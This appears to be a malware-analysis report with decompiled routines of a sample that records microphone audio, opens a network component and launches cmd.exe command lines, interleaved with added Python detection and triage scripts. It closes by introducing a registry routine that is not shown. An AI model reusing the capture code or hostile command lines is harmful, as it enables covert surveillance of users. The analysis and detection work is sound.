                                                                                    0x04ec1c24
                                                                                    0x04ec1c26
                                                                                    0x04ec1c2e
                                                                                    0x04ec1c36
                                                                                    0x04ec1c3e
                                                                                    0x04ec1c41
                                                                                    0x04ec1c49
                                                                                    0x04ec1c4b
                                                                                    0x04ec1c43
                                                                                    0x04ec1c43
                                                                                    0x04ec1c45
                                                                                    0x04ec1c45
                                                                                    0x04ec1c38
                                                                                    0x04ec1c38
                                                                                    0x04ec1c3a
                                                                                    0x04ec1c3a
                                                                                    0x04ec1c59
                                                                                    0x04ec1c6e
                                                                                    0x04ec1c7e
                                                                                    0x04ec1c8c
                                                                                    0x04ec1c96
                                                                                    0x04ec1c99
                                                                                    0x04ec1c9d
                                                                                    0x04ec1ca5
                                                                                    0x04ec1ca9
                                                                                    0x04ec1cb8
                                                                                    0x04ec1cca
                                                                                    0x04ec1cda
                                                                                    0x04ec1ce4
                                                                                    0x04ec1cea
                                                                                    0x04ec1cf3

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 04EC1C07
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC1C10
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 04EC1C6E
                                                                                    • InterlockedExchange.KERNEL32(?,40CC0020), ref: 04EC1C8C
                                                                                    • CreateEventW.KERNEL32 ref: 04EC1CAE
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000), ref: 04EC1CDA
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC1CE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CreateEvent
                                                                                    • String ID:
                                                                                    • API String ID: 939225815-0
                                                                                    • Opcode ID: b7f546e07026500a4c0ab8be9665bb58232939ae8be0de2a43fd911729d2b578
                                                                                    • Instruction ID: 2de5e928b3271606bf8ecf25c873f7ad1d78a2c6f1cea8124c0e88381e49ce2d
                                                                                    • Opcode Fuzzy Hash: b7f546e07026500a4c0ab8be9665bb58232939ae8be0de2a43fd911729d2b578
                                                                                    • Instruction Fuzzy Hash: 8531E371704301BFE7049B29CD05F66FBE5FB48715F10025AFA589A2C1CBB5B8508BD6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB13D0(void* __ecx) {
                                                                                    				long _v8;
                                                                                    				char _v12;
                                                                                    				HWAVEIN* _t41;
                                                                                    				void* _t47;
                                                                                    				struct wavehdr_tag** _t49;
                                                                                    
                                                                                    				_t47 = __ecx;
                                                                                    				if(waveInGetNumDevs() != 0) {	// give up if the host has no audio-input device
                                                                                    					_v8 = 0;
                                                                                    					// Worker thread (entry E04EB1550, parameter = this object) is created with
                                                                                    					// flags 4 == CREATE_SUSPENDED; its id lands in _v8 and becomes the callback target.
                                                                                    					 *(_t47 + 0x2c) = CreateThread(0, 0, E04EB1550, __ecx, 4,  &_v8);
                                                                                    					_t41 = _t47 + 0x18;	// HWAVEIN slot at +0x18
                                                                                    					// waveInOpen(phwi, device 0xffff, WAVEFORMATEX at +0x46, callback = thread id, 0,
                                                                                    					// 0x20000 == CALLBACK_THREAD): filled buffers arrive as MM_WIM_DATA messages in the worker's queue.
                                                                                    					if(waveInOpen(_t41, 0xffff, _t47 + 0x46, _v8, 0, 0x20000) == 0) {
                                                                                    						_t49 = _t47 + 0x30;
                                                                                    						_v12 = 2;
                                                                                    						// Prepare the two WAVEHDR records pointed to from +0x30 and +0x34
                                                                                    						// (0x20 == sizeof(WAVEHDR) on 32-bit); each gets a capture buffer taken
                                                                                    						// from +0x8 / +0xc and the buffer length stored at +0x4.
                                                                                    						do {
                                                                                    							 *( *_t49) =  *(_t49 - 0x28);
                                                                                    							 *_t49->dwBufferLength =  *(_t47 + 4);
                                                                                    							 *_t49->dwFlags = 0;
                                                                                    							 *_t49->dwLoops = 0;
                                                                                    							waveInPrepareHeader( *_t41,  *_t49, 0x20);
                                                                                    							_t14 =  &_v12;
                                                                                    							 *_t14 = _v12 - 1;
                                                                                    							_t49 =  &(_t49[1]);
                                                                                    						} while ( *_t14 != 0);
                                                                                    						// Queue the header selected by the index at +0x1c, release the suspended
                                                                                    						// worker, and start recording from the microphone.
                                                                                    						waveInAddBuffer( *_t41,  *(_t47 + 0x30 +  *(_t47 + 0x1c) * 4), 0x20);
                                                                                    						ResumeThread( *(_t47 + 0x2c));
                                                                                    						waveInStart( *_t41);
                                                                                    						 *((char*)(_t47 + 0x44)) = 1;	// recording-active flag
                                                                                    						return 1;
                                                                                    					} else {
                                                                                    						return 0;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}








                                                                                    0x04eb13d7
                                                                                    0x04eb13e1
                                                                                    0x04eb13ee
                                                                                    0x04eb1412
                                                                                    0x04eb1415
                                                                                    0x04eb142a
                                                                                    0x04eb1435
                                                                                    0x04eb1438
                                                                                    0x04eb1440
                                                                                    0x04eb1447
                                                                                    0x04eb144e
                                                                                    0x04eb1453
                                                                                    0x04eb145c
                                                                                    0x04eb1467
                                                                                    0x04eb146d
                                                                                    0x04eb146d
                                                                                    0x04eb1471
                                                                                    0x04eb1471
                                                                                    0x04eb1481
                                                                                    0x04eb148a
                                                                                    0x04eb1492
                                                                                    0x04eb149a
                                                                                    0x04eb14a4
                                                                                    0x04eb142c
                                                                                    0x04eb1433
                                                                                    0x04eb1433
                                                                                    0x04eb13e3
                                                                                    0x04eb13e9
                                                                                    0x04eb13e9

                                                                                    APIs
                                                                                    • waveInGetNumDevs.WINMM ref: 04EB13D9
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EB1550,?,00000004,?), ref: 04EB1402
                                                                                    • waveInOpen.WINMM(00000004,0000FFFF,?,00000000,00000000,00020000,?,00000004,?), ref: 04EB1422
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wave$CreateDevsOpenThread
                                                                                    • String ID:
                                                                                    • API String ID: 3981276002-0
                                                                                    • Opcode ID: 5da8269cd4ca49b0debc5dcd36042bea61892eb805ca5d8970eba5192a76f308
                                                                                    • Instruction ID: d6f8a1d21802051b74b085a4bf372f5a99722d2bc4fd5146a9b52f0e01591ff2
                                                                                    • Opcode Fuzzy Hash: 5da8269cd4ca49b0debc5dcd36042bea61892eb805ca5d8970eba5192a76f308
                                                                                    • Instruction Fuzzy Hash: 19218B72640204BFDB20CFA9E848B95FBB9FF89305F104099EA4497650D772B825CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
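
The per-function "APIs" summaries in this report (the `• API.MODULE(args), ref: addr` lines) are the fastest thing to triage, but the arguments are raw hex. The Python below is an added example by the editor, not part of the report or of the sample's code: it parses those lines for the two named functions above, decodes the constants this section exercises (CreateThread's creation flags, waveInOpen's callback type, and, as an editor's heuristic, any value that looks like a BitBlt raster operation), and tags each function with a triage label. The sample text is copied from this section; the decoder tables and the `audio-input-capture` / `worker-thread-handoff` rules are assumptions of the example, not something the analyser emits.

```python
import re
from typing import Optional

# Constructed sample input: the API summary lines copied from the report
# section above, each group preceded by its function's signature line.
SAMPLE_REPORT = """\
E04EC1BF0(intOrPtr __ecx, intOrPtr _a4) {
APIs
• WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 04EC1C07
• CloseHandle.KERNEL32(?), ref: 04EC1C10
• InterlockedExchange.KERNEL32(?,?), ref: 04EC1C6E
• InterlockedExchange.KERNEL32(?,40CC0020), ref: 04EC1C8C
• CreateEventW.KERNEL32 ref: 04EC1CAE
• WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000), ref: 04EC1CDA
• CloseHandle.KERNEL32(?), ref: 04EC1CE4
E04EB13D0(void* __ecx) {
APIs
• waveInGetNumDevs.WINMM ref: 04EB13D9
• CreateThread.KERNEL32(00000000,00000000,04EB1550,?,00000004,?), ref: 04EB1402
• waveInOpen.WINMM(00000004,0000FFFF,?,00000000,00000000,00020000,?,00000004,?), ref: 04EB1422
"""

FUNC_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(.*\{\s*$")            # E04EB13D0(void* __ecx) {
API_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"                      # CreateThread.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"  # (args), ref: 04EB1402
)

# Documented Win32 constants for the arguments this section exercises.
CREATE_THREAD_FLAGS = {0x00000004: "CREATE_SUSPENDED",
                       0x00010000: "STACK_SIZE_PARAM_IS_A_RESERVATION"}
WAVE_CALLBACK_TYPES = {0x00000000: "CALLBACK_NULL", 0x00010000: "CALLBACK_WINDOW",
                       0x00020000: "CALLBACK_THREAD", 0x00030000: "CALLBACK_FUNCTION",
                       0x00050000: "CALLBACK_EVENT"}
CALLBACK_TYPEMASK = 0x00070000
SRCCOPY, CAPTUREBLT = 0x00CC0020, 0x40000000

# Triage rules (assumption of this example): a function gets the tag when it
# calls every API in the set.
TRIAGE_RULES = {
    "audio-input-capture": {"waveInGetNumDevs", "waveInOpen"},
    "worker-thread-handoff": {"CreateEventW", "WaitForSingleObject", "CloseHandle"},
}


def decode_arg(api: str, idx: int, value: int) -> Optional[str]:
    """Symbolic reading of argument `idx` of `api`, or None if nothing is known."""
    if api == "CreateThread" and idx == 4:
        names = [n for bit, n in CREATE_THREAD_FLAGS.items() if value & bit]
        return "|".join(names) or None
    if api == "waveInOpen" and idx == 5:
        return WAVE_CALLBACK_TYPES.get(value & CALLBACK_TYPEMASK)
    # Heuristic (editor's assumption): a value whose low 24 bits equal SRCCOPY is
    # read as a BitBlt raster operation, whichever API it is passed to.
    if (value & 0x00FFFFFF) == SRCCOPY:
        return "SRCCOPY|CAPTUREBLT" if value & CAPTUREBLT else "SRCCOPY"
    return None


def parse_args(text: Optional[str]) -> list:
    """'00000004,?' -> [4, None]; '?' is an argument the analyser could not recover."""
    if not text:
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def parse_report(text: str) -> dict:
    """Group API lines by decompiled function, decode constants, apply triage rules."""
    funcs, current = {}, None
    for line in text.splitlines():
        m = FUNC_RE.match(line)
        if m:
            current = m.group(1)
            funcs[current] = {"apis": [], "decoded": {}, "tags": []}
            continue
        m = API_RE.match(line)
        if not m or current is None:
            continue
        api, ref = m.group("api"), m.group("ref").upper()
        entry = funcs[current]
        entry["apis"].append((api, m.group("module"), ref))
        for idx, value in enumerate(parse_args(m.group("args"))):
            name = decode_arg(api, idx, value) if value is not None else None
            if name:
                entry["decoded"].setdefault(f"{api}@{ref}", {})[idx] = name
    for entry in funcs.values():
        called = {api for api, _, _ in entry["apis"]}
        entry["tags"] = sorted(t for t, need in TRIAGE_RULES.items() if need <= called)
    return funcs


if __name__ == "__main__":
    for name, entry in parse_report(SAMPLE_REPORT).items():
        print(name, entry["tags"])
        for call, args in entry["decoded"].items():
            print("   ", call, args)
```

Run against the sample, E04EB13D0 decodes to CreateThread flag CREATE_SUSPENDED and waveInOpen callback type CALLBACK_THREAD and is tagged audio-input-capture; E04EC1BF0 decodes the second InterlockedExchange value as SRCCOPY|CAPTUREBLT and is tagged worker-thread-handoff. The report's API list for E04EB13D0 omits the waveInPrepareHeader, waveInAddBuffer, ResumeThread and waveInStart calls visible in the C code, which is why the audio rule keys only on waveInGetNumDevs and waveInOpen.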

                                                                                    C-Code - Quality: 90%
			// Starts the sample's asynchronous network component. __ecx is a C++-style object
			// (vtable at *__ecx); the start is only accepted from state 3 (field +0x54). A TCP
			// socket is created and bound inside E04ED2030 and a new I/O completion port is
			// created here. Returns 1 on success and 0 otherwise, preserving the last error.
			E04ED1E60(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* _t23;
				long _t24;
				void* _t27;
				long _t32;
				intOrPtr* _t41;
				void* _t42;
				void* _t43;

				_t41 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x118))() == 0) { // virtual call, vtable slot 0x118
					L10:
					return 0;
				} else {
					E04ECE8D0(__ecx + 0x174); // take the lock at +0x174 (InterlockedCompareExchange + SwitchToThread, see APIs)
					if( *(__ecx + 0x54) != 3) { // +0x54: state field
						 *((intOrPtr*)(__ecx + 0x58)) = 1; // +0x58: failure reason
						SetLastError(0x139f); // 0x139F = 5023 = ERROR_INVALID_STATE
						 *(_t41 + 0x174) = 0; // release the lock
						goto L10;
					} else {
						 *(__ecx + 0x54) = 0;
						 *(__ecx + 0x174) = 0; // release the lock
						 *((intOrPtr*)( *__ecx + 0x11c))(); // virtual call, vtable slot 0x11c
						_t23 = E04ED2030(__ebx, __ecx, __ecx, _t42, _a4); // socket(SOCK_STREAM, IPPROTO_TCP) + bind with namelen 0x1C (28 = sizeof(SOCKADDR_IN6)); see APIs
						_t43 = GetLastError;
						if(_t23 == 0) {
							L8:
							_t24 = GetLastError(); // keep the error code across the next call
							 *((intOrPtr*)( *_t41))(); // virtual call, vtable slot 0 (presumably teardown)
							SetLastError(_t24);
							return 0;
						} else {
							// INVALID_HANDLE_VALUE with no existing port: create a fresh completion port
							_t27 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
							 *(_t41 + 0x50) = _t27; // +0x50: completion port handle
							if(_t27 == 0) {
								_t32 = GetLastError();
								 *((intOrPtr*)(_t41 + 0x58)) = 7; // failure reason 7: no completion port
								SetLastError(_t32);
							}
							if( *(_t41 + 0x50) == 0 || E04ED2150(_t41, _t41, _t43) == 0) {
								goto L8;
							} else {
								 *((intOrPtr*)(_t41 + 0x4c)) = _a8;
								 *((intOrPtr*)(_t41 + 0x54)) = 1; // state 1
								ResetEvent( *(_t41 + 0x3c)); // +0x3c: event handle
								return 1;
							}
						}
					}
				}
			}

Instruction addresses the decompiler attached to the lines of the listing above (0x00000000 where none was recorded):
0x04ed1e65 0x04ed1e71 0x04ed1f48 0x04ed1f4c 0x04ed1e77 0x04ed1e7d 0x04ed1e86 0x04ed1f30 0x04ed1f37 0x04ed1f3d 0x00000000 0x04ed1e8c 0x04ed1e8c 0x04ed1e95
0x04ed1ea1 0x04ed1eac 0x04ed1eb1 0x04ed1eb9 0x04ed1f12 0x04ed1f12 0x04ed1f1a 0x04ed1f1d 0x04ed1f28 0x04ed1ebb 0x04ed1ec3 0x04ed1ec9 0x04ed1ece 0x04ed1ed0
0x04ed1ed3 0x04ed1eda 0x04ed1eda 0x04ed1ee4 0x00000000 0x04ed1ef1 0x04ed1ef7 0x04ed1efa 0x04ed1f01 0x04ed1f0f 0x04ed1f0f 0x04ed1ee4 0x04ed1eb9 0x04ed1e86

                                                                                    APIs
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1F37
                                                                                      • Part of subcall function 04ED2030: socket.WS2_32(?,00000001,00000006), ref: 04ED2099
                                                                                      • Part of subcall function 04ED2030: bind.WS2_32(00000000,00000002,0000001C), ref: 04ED20BE
                                                                                      • Part of subcall function 04ED2030: closesocket.WS2_32(00000000), ref: 04ED20F4
                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?), ref: 04ED1EC3
                                                                                    • GetLastError.KERNEL32 ref: 04ED1ED0
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ED1EDA
                                                                                    • ResetEvent.KERNEL32(?), ref: 04ED1F01
                                                                                    • GetLastError.KERNEL32(?), ref: 04ED1F12
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ED1F1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CompareCompletionCreateEventExchangeInterlockedPortResetSwitchThreadbindclosesocketsocket
                                                                                    • String ID:
                                                                                    • API String ID: 1231050892-0
                                                                                    • Opcode ID: b211a26ef4fc59488e9cd2450fb5b5d90b5935525cdf2e1816214e2541e65ed7
                                                                                    • Instruction ID: b4427d69fe0d8b3821c29d5d6acc4e604bf875e9781fad8d764b6b8ae798987d
                                                                                    • Opcode Fuzzy Hash: b211a26ef4fc59488e9cd2450fb5b5d90b5935525cdf2e1816214e2541e65ed7
                                                                                    • Instruction Fuzzy Hash: 0E214F31300602AFE714AFBAD8087D9FBA9FF84369F144166E909C7690DB75F865CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 52%
			// Command dispatcher: the low byte of _a4 selects the launch target. Cases 0, 1 and 6
			// build a command line in _v532 and pass it, together with the member at +0x70, to
			// E04EC72A0; cases 2, 3 and 4 call dedicated handlers; case 5 does nothing, and no
			// case 7 appears in the listing although the bound check admits it.
			E04EB6BF0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed char _a4) {
				signed int _v8;
				signed int _v12;
				short _v532;
				char _v548;
				signed int _t15;
				signed int _t17;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t35;
				signed int _t37;

				_t27 = __ecx;
				_t26 = __ebx;
				_t37 = (_t35 & 0xfffffff8) - 0x224; // 8-byte aligned frame of 0x224 (548) bytes, matching the _v548 layout
				_t15 =  *0x4f03008; // 0x3d21fb31 (/GS stack-cookie seed)
				_v8 = _t15 ^ _t37;
				_t17 = _a4 & 0x000000ff; // command byte
				asm("xorps xmm0, xmm0");
				_t33 = __ecx;
				asm("movups [esp+0x8], xmm0"); // zero 16 bytes of the frame
				if(_t17 > 7) { // commands 0..7 only
					L10:
					return E04ED572E(_v8 ^ _t37); // stack-cookie check
				} else {
					switch( *((intOrPtr*)(_t17 * 4 +  &M04EB6CE4))) { // jump table at M04EB6CE4
						case 0:
							GetWindowsDirectoryW( &_v532, 0x104); // 0x104 = MAX_PATH
							lstrcatW( &_v532, L"\\explorer.exe"); // -> %WINDIR%\explorer.exe
							goto L9;
						case 1:
							// shell32.dll export ordinal 61 is RunFileDlg: this opens the Windows Run dialog
							_push(L"cmd.exe /c rundll32.exe shell32.dll,#61");
							goto L8;
						case 2:
							__eax = E04EB6870(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
							_pop(__esi);
							__ecx = _v12;
							__ecx = _v12 ^ __esp;
							__eflags = __ecx;
							return E04ED572E(__ecx); // stack-cookie check
							goto L11;
						case 3:
							__eax = E04EB6950(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
							_pop(__esi);
							__ecx = _v12;
							__ecx = _v12 ^ __esp;
							__eflags = __ecx;
							return E04ED572E(__ecx); // stack-cookie check
							goto L11;
						case 4:
							__eax = E04EB6A30(__ebx, __ecx, __edi, __esi, __eflags, __ecx);
							_pop(__esi);
							__ecx = _v12;
							__ecx = _v12 ^ __esp;
							__eflags = __ecx;
							return E04ED572E(__ecx); // stack-cookie check
							goto L11;
						case 5:
							goto L10;
						case 6:
							_push(L"cmd.exe /c start iexplore.exe");
							L8:
							 &_v532 = lstrcpyW( &_v532, ??); // copy the pushed literal into the path buffer
							L9:
							_push( &_v548);
							_push( &_v532);
							_push(_t27);
							E04EC72A0(_t26,  *((intOrPtr*)(_t33 + 0x70)), _t39); // launch the built command line
							_t37 = _t37 - 8 + 0x14;
							goto L10;
					}
				}
				L11:
			}

Instruction addresses the decompiler attached to the lines of the listing above (0x00000000 where none was recorded):
0x04eb6bf0 0x04eb6bf0 0x04eb6bf6 0x04eb6bfc 0x04eb6c03 0x04eb6c0a 0x04eb6c0e 0x04eb6c12 0x04eb6c14 0x04eb6c1c 0x04eb6ccc 0x04eb6cde 0x04eb6c22 0x04eb6c22
0x00000000 0x04eb6c33 0x04eb6c43 0x00000000 0x00000000 0x04eb6c4b 0x00000000 0x00000000 0x04eb6c53 0x04eb6c58 0x04eb6c59 0x04eb6c60 0x04eb6c60 0x04eb6c6a
0x00000000 0x00000000 0x04eb6c6e 0x04eb6c73 0x04eb6c74 0x04eb6c7b 0x04eb6c7b 0x04eb6c85 0x00000000 0x00000000 0x04eb6c89 0x04eb6c8e 0x04eb6c8f 0x04eb6c96
0x04eb6c96 0x04eb6ca0 0x00000000 0x00000000 0x00000000 0x00000000 0x04eb6ca3 0x04eb6ca8 0x04eb6cad 0x04eb6cb3 0x04eb6cba 0x04eb6cc2 0x04eb6cc3 0x04eb6cc4
0x04eb6cc9 0x00000000 0x00000000 0x04eb6c22 0x00000000

                                                                                    APIs
                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 04EB6C33
                                                                                    • lstrcatW.KERNEL32(?,\explorer.exe), ref: 04EB6C43
                                                                                    • lstrcpyW.KERNEL32 ref: 04EB6CAD
                                                                                    Strings
                                                                                    • cmd.exe /c rundll32.exe shell32.dll,#61, xrefs: 04EB6C4B
                                                                                    • \explorer.exe, xrefs: 04EB6C39
                                                                                    • cmd.exe /c start iexplore.exe, xrefs: 04EB6CA3
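The three strings listed above are the complete set of launch targets that E04EB6BF0 builds: explorer.exe from the Windows directory (case 0), the Run dialog through shell32.dll ordinal 61 (case 1), and Internet Explorer through cmd.exe (case 6). What follows is an added example, not code from this report or from the sample: a small Python scanner that applies the matching process-creation checks to constructed Sysmon-style events. The event format, the parent-process allow-list and the hypothetical dropper path are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (one per line, key=value pairs
# separated by '|'). These are invented samples, not telemetry from the report;
# the parent path C:\Users\u\AppData\Local\Temp\dropper.tmp is hypothetical.
SAMPLE_EVENTS = """\
ParentImage=C:\\Windows\\System32\\userinit.exe|Image=C:\\Windows\\explorer.exe|CommandLine=C:\\Windows\\explorer.exe
ParentImage=C:\\Users\\u\\AppData\\Local\\Temp\\dropper.tmp|Image=C:\\Windows\\explorer.exe|CommandLine=C:\\Windows\\explorer.exe
ParentImage=C:\\Users\\u\\AppData\\Local\\Temp\\dropper.tmp|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c rundll32.exe shell32.dll,#61
ParentImage=C:\\Windows\\System32\\cmd.exe|Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32.exe shell32.dll,#61
ParentImage=C:\\Users\\u\\AppData\\Local\\Temp\\dropper.tmp|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c start iexplore.exe
ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\rundll32.exe|CommandLine=rundll32.exe SHELL32.DLL,ShellExec_RunDLL notepad.exe
ParentImage=C:\\Windows\\System32\\svchost.exe|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c start "" "http://example.invalid"
"""

# Case 1: rundll32 calling shell32 ordinal 61 (RunFileDlg). Tolerates a missing
# ".exe"/".dll" and whitespace around the comma and the '#', which rundll32 accepts.
RUNFILEDLG = re.compile(r"\brundll32(?:\.exe)?\b.*\bshell32(?:\.dll)?\s*,\s*#\s*61\b", re.I)
# Case 6: cmd.exe /c start ... iexplore[.exe]
START_IEXPLORE = re.compile(r"\bcmd(?:\.exe)?\b.*/c\s+start\b.*\biexplore(?:\.exe)?\b", re.I)
# Case 0 builds exactly %WINDIR%\explorer.exe; processes that legitimately start the
# shell (tune this allow-list for your environment, it is an assumption here).
EXPLORER_PARENT_ALLOWLIST = {"userinit.exe", "explorer.exe"}
WINDIR_EXPLORER = re.compile(r"[a-z]:\\windows\\explorer\.exe", re.I)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'K=V|K=V' into a dict; values may contain '=' so split on the first one only."""
    fields: Dict[str, str] = {}
    for part in line.rstrip("\n").split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event triggers (possibly none)."""
    hits: List[str] = []
    cmd = event.get("CommandLine", "")
    image = event.get("Image", "")
    parent = basename(event.get("ParentImage", ""))
    if RUNFILEDLG.search(cmd):
        hits.append("run_dialog_via_rundll32_ordinal_61")
    if START_IEXPLORE.search(cmd):
        hits.append("iexplore_started_via_cmd")
    if WINDIR_EXPLORER.fullmatch(image) and parent not in EXPLORER_PARENT_ALLOWLIST:
        hits.append("explorer_started_by_unusual_parent")
    return hits


def scan(text: str) -> List[Tuple[str, str]]:
    """Run every rule over every non-empty line; returns (rule, command line) pairs."""
    findings: List[Tuple[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for rule in classify(event):
            findings.append((rule, event.get("CommandLine", "")))
    return findings


if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_EVENTS):
        print(f"{rule}: {cmd}")
```

The explorer rule is the noisiest of the three (users restart explorer.exe from Task Manager, and some logon scripts do too), so it is best used as context for the other two rather than as a stand-alone alert; `rundll32 shell32.dll,#61` launched from cmd.exe is specific enough to alert on directly.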
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindowslstrcatlstrcpy
                                                                                    • String ID: \explorer.exe$cmd.exe /c rundll32.exe shell32.dll,#61$cmd.exe /c start iexplore.exe
                                                                                    • API String ID: 4189314281-3733130215
                                                                                    • Opcode ID: 135497e05716e497b0eaab7694d1fcc14500351267a4a8fa09551d421b593458
                                                                                    • Instruction ID: 16483c1a334b1dbc55e69847fd076388d983cfa7ad9a0b3d68b887a6590c2e00
                                                                                    • Opcode Fuzzy Hash: 135497e05716e497b0eaab7694d1fcc14500351267a4a8fa09551d421b593458
                                                                                    • Instruction Fuzzy Hash: D12105B2614208ABD234EBB4F9468EBB3D8EF88315F105A5FF98586140EA74F454CBD7
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
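The routine E04EC6B30 that follows opens HKLM\SOFTWARE\Classes\CLSID\<name> with KEY_READ | KEY_WOW64_64KEY and reads a DWORD value named "1"; the subkey name is derived from "SEOID" by E04EC6010 and is not shown in this report. As an added example (not code from the report or from the sample), the Python below parses a `reg export` of that hive and flags direct CLSID subkeys that carry a REG_DWORD named "1" or whose name is not a {GUID}. The .reg excerpt, including the two suspicious subkey names, is constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt in the format written by
#   reg export HKLM\SOFTWARE\Classes\CLSID clsid.reg /reg:64
# The first key is an ordinary COM registration; the last two are invented
# examples of what the routine would read. The real subkey name is not known.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}]
@="Shortcut"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32]
@="C:\\Windows\\System32\\windows.storage.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7F3A2C11-5B0E-4D2A-9C21-1E2F3A4B5C6D}]
"1"=dword:0000002a

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\a1b2c3d4e5f6]
"1"=dword:00000001
"2"=hex:de,ad,be,ef
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"=(?P<data>.*)$')
GUID_RE = re.compile(r"^\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}$", re.I)
CLSID_PREFIX = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\"


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: key path -> {value name: raw data}. The default value is '@'."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        if current is None or not line.strip():
            continue
        if line.startswith("@="):
            keys[current]["@"] = line[2:]
            continue
        m = VALUE_RE.match(line)
        if m:
            keys[current][m.group("name")] = m.group("data")
    return keys


def hunt(text: str) -> List[Tuple[str, str]]:
    """Flag direct CLSID subkeys that look like the storage E04EC6B30 reads."""
    findings: List[Tuple[str, str]] = []
    for path, values in parse_reg(text).items():
        if not path.upper().startswith(CLSID_PREFIX.upper()):
            continue
        sub = path[len(CLSID_PREFIX):]
        if "\\" in sub:  # the format string names a direct child of CLSID, not a deeper key
            continue
        data = values.get("1")
        if data is not None and data.lower().startswith("dword:"):
            findings.append((sub, f"value '1' = REG_DWORD 0x{int(data[6:], 16):08x}"))
        if not GUID_RE.match(sub):  # COM class keys are GUIDs; anything else is out of place
            findings.append((sub, "subkey name is not a {GUID}"))
    return findings


if __name__ == "__main__":
    for sub, why in hunt(SAMPLE_REG):
        print(f"{sub}: {why}")
```

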